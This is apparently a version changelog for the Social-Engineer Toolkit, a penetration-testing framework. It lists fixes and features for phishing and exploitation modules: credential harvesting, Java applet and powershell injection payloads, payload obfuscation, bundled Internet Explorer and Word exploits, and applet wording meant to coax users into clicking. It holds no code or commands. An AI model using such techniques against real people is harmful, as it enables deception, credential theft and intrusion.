* fixed a sql port bug error that would cause the mssql bruter to fail when importing a list without a port
* fixed an issue in sql bruter when legacy debug method was used if no powershell, would error out when selecting a standard Metasploit payload
* fixed an issue that was causing a menu mismatch using the web attack vector, when selecting anything above 5 would cause a menu mismtach
* fixed d4rk0 menu system so when you 99 out, it goes back to the SET menus by returning at that point versus exit(0)
* removed NAT and cloner from d4rk0 fsattack - it was automatically added based on attack vector, wasn't needed
* added additional fixes for msfvenom and generating https/http shells
* fixed an issue that would cause webjacking method to not successfully redirect to index2.html when use APACHE_SERVER=ON
* made apache_server=on to the default - still configurable in config/set_config
* fixed a bug that would cause mssql deploy stager on legacy debug64 to throw an error on not finding 1msf.exe - this has since been resolved
* removed old references to a module that is no longer in SET
* updated the SET user manual to the latest version 6.0 and incorporated the FSAttack from d4rk0s
* added ablity for OSX persistence when you have access to the filesystem
* permenantly removed the command center, will redesign later - no longer needed
* removed command center wording from SET user manual
* removed command center options in the set_config
* removed unused options inside set_config related to mlitm
* added automatic check to see if bleeding edge repos were enabled or not when using Kali - if kali is in use will prompt to automatically enable bleeding edge repos
* updated seupdate to reflect bleeding edge repos as well
* removed self_signed_applet from the config menu - it will not prompt inside of the Java Applet Attack method
* added ability to use same codebase for the new selection process for SET.
* redesigned the java applet selection process and allow you to verify new code signign certificates or import your own applet into the java applet attack method
* added better error handlign when using setoolkit
* updated the version of RIDENUM to the latest version inside of SET
* updated the report template to remove secmaniac and update with trustedsec
* removed old references to secmaniac in various code segments
* added the MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free from Metasploit
* added the MS14-012 Microsoft Internet Explorer TextRange Use-After-Free exploit from Metasploit
* added the MS14-017 Microsoft Word RTF Object Confusion fileformat exploit
* added a new initial image loader (doctor who theme) - pssssh
* removed the metasploit update feature - this should be handled through kali and theres packages, distributions, etc. its hard to predict which will be used for Metasploit
* removed old mentions in update_config that were no longer needed
* removed the sms attack vector - it hasn't been maintained or updated in a long time and no longer supported
* added option 99 in qrcode generation to go back a previous menu, it was missing
* added set ExitOnSession for autorun attack inside of SET
* changed some of the formating and variable names in the fsattack
~~~~~~~~~~~~~~~~
version 5.4.8
~~~~~~~~~~~~~~~~
* fixed setdir not defined in SMS spoofing
* fixed an issue that would cause powershell injection to assign port of false under some circumstances
~~~~~~~~~~~~~~~~
version 5.4.7
~~~~~~~~~~~~~~~~
* added latest version and changes of RIDENUM to SET
~~~~~~~~~~~~~~~~
version 5.4.6
~~~~~~~~~~~~~~~~
* fixed OSX compatibility (pull request)
* fixed an issue with Teensy Shellcode generation - would throw path error
~~~~~~~~~~~~~~~~
version 5.4.5
~~~~~~~~~~~~~~~~
* fixed a bug in generating Arduino powershell injection would cause setdir to not be defined (bug ticket #44)
* fixed a bug in generating x10 Arduino blackout devices
~~~~~~~~~~~~~~~~
version 5.4.4
~~~~~~~~~~~~~~~~
* Fixed a from address bug when sending emails through an open relay
~~~~~~~~~~~~~~~~
version 5.4.3
~~~~~~~~~~~~~~~~
* Re-added database support for msfconsole, originally -n was specified to speed up load times, this is no longer needed and causes confusion
~~~~~~~~~~~~~~~~
version 5.4.2
~~~~~~~~~~~~~~~~
* Fixed issue that would enable stage encoding even when turned off
* Removed duplication bug on enable stage encoding when generating Metasploit answer files
* Fixed a port duplication issue where it would automatically assign port 443 when specifying multipyinjector
* Removed reference to set-automate to seautomate
* Fixed the self signed certificate issue where it was looking for the old program_junk folder, rewrote it to include proper .set directory path structure (thanks bostonlink)
* Fixed dhcp3 to isc-dhcp-server conversion to the new format, make sure you install apt-get install isc-dhcp-server - it will warn you regardless
~~~~~~~~~~~~~~~~
version 5.4.1
~~~~~~~~~~~~~~~~
* Fixed an issue that would exit SET completely when using file format custom PDF's
* Fixed text wrapping in menus where it didnt fit right, this was due to tab completion, have since disabled
* Changed manifest name to "Applet is verified (SECURE)" for the Java Applet attack
* Added error handling in main setoolkit launcher
* Removed set-web set-automate set-update and set-proxy and moved naming scheme to seweb seautomate seupdate and seproxy
* Added redirect handling for gmail since the splash page no longer contains username/passwords
~~~~~~~~~~~~~~~~
version 5.4
~~~~~~~~~~~~~~~~
* added new config option to add STAGE_ENCODING as a false/true flag in case you want to turn it off or on
* added STAGE_ENCODING options to payload generation
* added STAGE_ENCODING options to psexec commands powershell injection
* added STAGE_ENCODING options to the powershell injectiont technique
* fixed a bug that would cause psexec powershell injection to not generate the proper base64 encoding
* added obfuscation to the pyinjection binary
* added obfuscation to the multipyinjection binary
* added proper permissions for manifest files within SET and Java Applet - removes warning message in applets
* officially removed se-toolkit - use setoolkit from now on to launch SET
* fixed a bug that would cause SET to not function properly if running from a different directory and /usr/share/setoolkit was present
* fixed SET to no longer use se-toolkit in the launcher
* fixed an issue that would cause STAGE_ENCODING to report None type instead of on/off
* added STAGE_ENCODING to update_config.py options for dynamic importing
* fixed an issue that would cause powershell option for alphanumeric shellcode to error out by not finding appropriate file structure - fixed by creating file prior to calling payload.powershell.prep
* fixed a bug that would cause standalone payload generation to error out on option 4 due to length parameter exceptions
* added better manifest handling and build tools for development
* added better unsigned.jar obfuscation upon creating the applet
~~~~~~~~~~~~~~~~
version 5.3.9
~~~~~~~~~~~~~~~
* small bug fix that caused shellcodeexec to error out
~~~~~~~~~~~~~~~~
version 5.3.8
~~~~~~~~~~~~~~~~
* updated RID_ENUM to the latest version
* Changed twitter handle from dave_rel1k to @hackingdave
* Added the MS13-080 exploit from Metasploit
~~~~~~~~~~~~~~~~
version 5.3.7
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause connecting directly to an MSSQL server to fail based on an undefined module _mssql
~~~~~~~~~~~~~~~~
version 5.3.6
~~~~~~~~~~~~~~~~
* Added the Micorosft Internet Explorer SetMouseCapture Use-After-Free exploit in Metasploit released today.
* Fixed a bug that would cause LHOST to not be set when using other payloads than pyInjector and Multi-Pyinjector.
* Fixed an issue that would cause emails to only accept the first line of the email (thanks for the submission from Vladmir)
* Fixed an issue when URLs had special characters or spaces in the URL
~~~~~~~~~~~~~~~~
version 5.3.5
~~~~~~~~~~~~~~~~
* fixed an issue that would cause an integer error when using pyinjector
* fixed a print option that was no longer needed
~~~~~~~~~~~~~~~~
version 5.3.4
~~~~~~~~~~~~~~~~
* added better handling when exporting autorun configuration using payload selection options
* fixed a typo in the SET setup.py file "We are no finished" to "We are now finished"
* added new configuration option called HARVESTER_LOG_PASSWORDS, you can turn this off if you do not want to capture credentials
* fixed cannot import src.core.setcore when launching set interactive shell in solo mode
* rehauled large portion of the powershell injection so that when multipyinjector or pyinjector is specified, it will take the same attributes and payloads and overwrite the config options. This means that when you select say 10 payloads from multipyinjector, the powershell injection will match the exact same ports and payloads. This allows you to customize each of the payloads to what you want
~~~~~~~~~~~~~~~~
version 5.3.3
~~~~~~~~~~~~~~~~
* fixed an issue that would cause the download to randomized name to work properly on OSX
* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
* added better stability for osx exploitation
* fixed an issue that would cause the applet to not load on certain configurations (thanks pachulo)
~~~~~~~~~~~~~~~~
version 5.3.2
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause netstat to not report back the correct information on OSX (git bug report)
~~~~~~~~~~~~~~~~
version 5.3.1
~~~~~~~~~~~~~~~~
* Fixed an issue that was causing the Metasploit payloads for OSX/Linux to not generate properly.
* Added new configuration options in set_config to allow selectable Linux/OSX payloads.
* Added new configuration option to allow you to add a custom payload for OSX/Linux.
* Changed PowerShell injection from using port 8080, this is still configurable.
* Fixed an issue when meterpreter payloads were specified, encoding would default to 0 instead of 4.
* Fixed spacing issues on set LHOST commands within Powershell payload prep
* Cleaned up the Java Applet code and added appropriate spaces
* Fixed an issue that would cause OSX payloads to not properly work
~~~~~~~~~~~~~~~~
version 5.3
~~~~~~~~~~~~~~~~
* Fixed an issue that would cause ipaddr to not be defined when using multi-pyinjector.
* Changed se-toolkit for launch to setoolkit - easier to type when typing set.
* Fixed an issue that would cause set-automate to not properly work due to old set launcher.
* Added set EnableStageEncoding true to default on Multipyinjector.
* Added fixed ID param name name="" to applet tags to show up properly in Firefox, Chrome, etc.
* Converted payloads for shikata second stage encoding for all SET payloads
* Fixed a exceptions error when inside modules and control-c out of them
* Removed old wording in setup.py installer
* Added new conversion for setup.py to change se-toolkit to install with setoolkit.
* Slimmed the teensy powershell code down significantly
* Modified the teensy powershell attack to support the x86 downgrade attack.
* Slimmed down the mssql powershell attack vector significantly.
* Slimmed down the psexec powershell attack vector significantly.
* Updated rid_enum to the latest version within Fast-Track
* Realigned initial banner message when entering into SET
* Fixed a large bug in webjacking and tabnabbing where it would not load the index.html properly do to a os.remove on index.html instead of os.remove on site variable (index or index2.html)
* Removed old man left in the middle from the toolkit under multi-attack was no longer used and code removed
* Fixed an issue that would cause credential harvester and applet in multiattack to not properly work
* Fixed a bug that would cause APACHE to flag if it was run in a different directory
* Changed applet tag slightly to be more descriptive to coax users into clicking
* Fixed a backup issue when using java applet first then harvester second
* Fixed a large bug in multi-pyinjector that was causing the binary to not call back properly
* Fixed multiple other bugs with multi-pyinjector and also fixing freeze.support issues with multiprocessing
* Fixed a bug that would cause an IP to not assign when using pyinjector
* Added better stability to pyinjector regular and also virtualized the pe
* Fixed an issue causing linux and OSX binaries to not properly deploy
* Added faster load time on OSX and Linux creation of binaries when linux / osx mode added
* Changed how payload delivery is handled and loads faster within the applet
* Added better error handling if webattack email is set to on
* Fixed some old code from when you are in a loop
* Added a port options check when specifying multipyinjector and pyinjector to warn if port 80 is selected
* Added a check if number isn't specified in MSSQL bruter, it will default to option 1 (choice 1)
~~~~~~~~~~~~~~~~
version 5.2.2
~~~~~~~~~~~~~~~~
* Shortened the length of the powershell injection code when using the standpoint powershell injection
* Fixed an issue causing a port error when using the SQL brute force on a single IP address
* Fixed an issue causing msf.exe to not show up properly when generating a payload
* Fairly large change that puts LHOST from 0.0.0.0 (all interfaces) to your LHOST/IP address
~~~~~~~~~~~~~~~~
version 5.2.1